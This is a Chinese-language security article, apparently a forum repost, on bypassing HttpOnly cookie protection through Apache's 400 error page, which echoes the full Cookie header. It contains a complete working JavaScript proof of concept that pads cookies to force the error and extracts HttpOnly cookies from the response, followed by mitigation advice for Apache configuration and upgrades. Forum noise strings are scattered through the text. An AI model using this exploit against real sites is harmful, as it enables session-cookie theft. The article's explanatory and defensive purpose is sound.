很多程序以及一些商业或成熟开源的 CMS 文章系统，为了防止 XSS 盗取用户 Cookie，一般都会给 Cookie 加上 HttpOnly 属性，禁止 JS 通过 document.cookie 直接读取，从而降低 XSS 的危害。而本文所说的问题恰好可以用来绕过 HttpOnly：它利用的不是浏览器缺陷，而是 Apache 在返回 400 错误页时会把出错的请求头（包括浏览器自动附带的完整 Cookie 头）原样回显在响应正文里，页面里的脚本只要能读到这个响应，就能拿到 HttpOnly 的 Cookie。前提仍然是站点本身存在可以执行 JS 的 XSS 漏洞——HttpOnly 并没有"失效"，只是被绕了一圈。
4 r1 V1 x" s5 w" g2 b1 V2 G
用 Chrome 打开目标站点（必须在目标站点所在的源下执行，这样 XHR 才会自动带上它的 Cookie），按 F12 打开开发者工具，在 Console 中粘贴如下代码并回车：
) n3 M! n! [" K- `' } * p* u( s+ j) O. P& d$ o' x
4 w- u Y* ]4 g3 y [) Z- t, S; H
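// PoC for reading HttpOnly cookies through Apache's 400 error page, adapted
// from http://www.exploit-db.com/exploits/18442/. Run from the target origin's
// devtools console (current Chrome): setCookies() plants oversized cookies,
// makeRequest() then provokes a 400 whose body echoes the full Cookie header.

/**
 * Plant or expire the oversized padding cookies `xss0` … `xss{count-1}`.
 *
 * With `good` falsy, each cookie is set to a run of `size` "x" characters so
 * that the Cookie header the browser builds for the next request grows past
 * what the server accepts in one header field, and the request is rejected
 * with 400. The defaults (10 cookies of 819 bytes, a little over 8 KB in
 * total) are what the original PoC used; presumably they are tuned to
 * Apache's default per-header limit — adjust if the target differs.
 *
 * With `good` truthy, the same cookie names are re-set with an expiry in the
 * past, which makes the browser drop them. Always do this after the test:
 * while the padding cookies exist, every request to this origin fails.
 *
 * Side effect: writes document.cookie `count` times. Returns nothing.
 *
 * @param {boolean} [good]      truthy expires the cookies, falsy plants them.
 * @param {number}  [count=10]  number of padding cookies.
 * @param {number}  [size=819]  length of each padding value.
 */
function setCookies(good, count = 10, size = 819) {
  const padding = 'x'.repeat(size);
  // One millisecond in the past is enough — any past date expires a cookie.
  const expired = new Date(Date.now() - 1).toUTCString();
  for (let i = 0; i < count; i++) {
    const name = `xss${i}`;
    // The expiry must be written on the same path ("/") the cookie was
    // planted on, otherwise the browser treats it as a different cookie.
    document.cookie = good
      ? `${name}=;expires=${expired}; path=/;`
      : `${name}=${padding};path=/`;
  }
}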
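/**
 * Fetch "/" with the oversized padding cookies attached and, when the server
 * answers 400 with Apache's default error body, pull the echoed Cookie header
 * out of its `<pre>` block and show it.
 *
 * Flow: plant the padding cookies, issue an async same-origin GET, and on
 * completion (readyState 4) expire the padding cookies again *before* looking
 * at the status — the original PoC only cleaned up on a 400, which left ~8 KB
 * of junk cookies behind on a non-vulnerable server and broke every later
 * request to the origin. Only then, if the status is 400, parse the body.
 *
 * Why this works: the 400 page produced by an affected Apache version echoes
 * the offending request header as `<pre>Cookie: …</pre>`. The browser built
 * that header itself, so HttpOnly cookies are in it even though
 * document.cookie would never show them.
 *
 * Side effects: writes document.cookie (via setCookies) and calls alert().
 * Returns nothing; the extracted cookies are only displayed.
 */
function makeRequest() {
  setCookies();

  /**
   * Turn the raw 400 body into a name → value object of the echoed cookies,
   * dropping the xssN padding cookies this PoC planted.
   * @param {string} body  xhr.responseText of the error page.
   * @returns {Object<string,string>|null}  parsed cookies, or null when the
   *   body has no `<pre>` block (i.e. not the Apache error page we expect).
   */
  function parseCookies(body) {
    // Apache may wrap the echoed header across lines; flatten before matching.
    const match = body.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
    if (!match) {
      return null;
    }
    const header = match[1]
      .replace('Cookie: ', '')
      .replace(/xss\d+=x+;?/g, '');
    const cookies = {};
    for (const pair of header.split(';')) {
      // Split on the first "=" only; a cookie value may itself contain "=".
      const eq = pair.indexOf('=');
      if (eq === -1) {
        continue; // empty trailing segment or a malformed pair
      }
      // Pairs are separated by "; ", so trim the leading space off the name.
      const name = pair.slice(0, eq).trim();
      if (name) {
        cookies[name] = pair.slice(eq + 1);
      }
    }
    return cookies;
  }

  const xhr = new XMLHttpRequest();
  xhr.onreadystatechange = () => {
    if (xhr.readyState !== 4) {
      return;
    }
    // Clean up unconditionally — see the function comment.
    setCookies(true);
    if (xhr.status !== 400) {
      return;
    }
    const cookies = parseCookies(xhr.responseText);
    if (cookies) {
      alert(JSON.stringify(cookies));
    }
  };
  xhr.open('GET', '/', true);
  xhr.send(null);
}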
// Fire the PoC as soon as the snippet is pasted: plants the padding cookies
// and requests "/" on the current origin (see makeRequest above).
makeRequest();
( e. ]9 W9 F/ |+ `$ Z$ [: U4 X/ }5 W6 Y9 G0 ~
之后就能看到一个 400 错误，响应正文中包含完整的 Cookie 信息（HttpOnly 的也在其中）。原理是：脚本先写入 10 个各 819 字节的垃圾 Cookie，使下一次请求的 Cookie 头超出 Apache 允许的单个请求头长度，Apache 拒绝请求并返回 400，而存在此问题的版本会把这个超长的 Cookie 头整个回显在错误页的 <pre> 中；脚本再把解析出的 Cookie 弹出来，并把垃圾 Cookie 设为过期清理掉。注意：如果响应不是 400（例如服务器已修复），要确认 xss0…xss9 这些垃圾 Cookie 确实已被清理，否则之后对该站点的每个请求都会一直失败。
* s; R; N4 |8 a9 o; C' Z
下载地址：https://gist.github.com/pilate/1955a1c28324d4724b7b/download
修复方案：
/ I1 Q% S) ~( Y/ `2 f* B" V: V* O" A3 e( i7 c! A
Apache 官方提供了 4 种错误处理方式（http://httpd.apache.org/docs/2.0/mod/core.html#errordocument），如下：

In the event of a problem or error, Apache can be configured to do one of four things:

1. output a simple hardcoded error message —— 输出一个简单生硬的错误信息（默认行为，也就是会回显请求头的那个页面）
2. output a customized message —— 输出一段自定义文本
3. redirect to a local URL-path to handle the problem/error —— 转到一个本地的自定义页面
4. redirect to an external URL to handle the problem/error —— 转到一个外部 URL

经测试，对于 400 错误只有方式 2 有效：配置后返回包不再包含 Cookie 内容。方式 3、4 对这类 400 不起作用（推测是因为请求头本身就非法，Apache 在进入正常请求处理之前就已拒绝，无法再内部转发到自定义页面），以实际测试为准。
' C" X G' R" f" k5 a2 Z) W S# H6 F: @9 O8 N- |6 e! |5 ^4 _( o
Apache 配置：

ErrorDocument 400 "security test"

（ErrorDocument 的文本消息形式；原文里 ErrorDocument 与 400 之间缺少空格，不是合法写法。改完后重新跑一遍上面的脚本，确认 400 响应里不再出现 Cookie。）
' p. |( H% P& p+ z' X
当然，最根本的修复是把 Apache 升级到参考链接中列出的、不再回显请求头的版本；ErrorDocument 只是隐藏了回显，属于临时缓解。另外应用层的 HttpOnly 仍然值得保留——它本身没有失效，被绕过的前提是站点已经存在 XSS，修 XSS 和升级 Apache 两件事都要做。

参考：http://httpd.apache.org/security/vulnerabilities_22.html
# \! D' e! y0 m% d5 ~: M7 a& M5 H- N, I) g7 y; h6 y/ V# a
|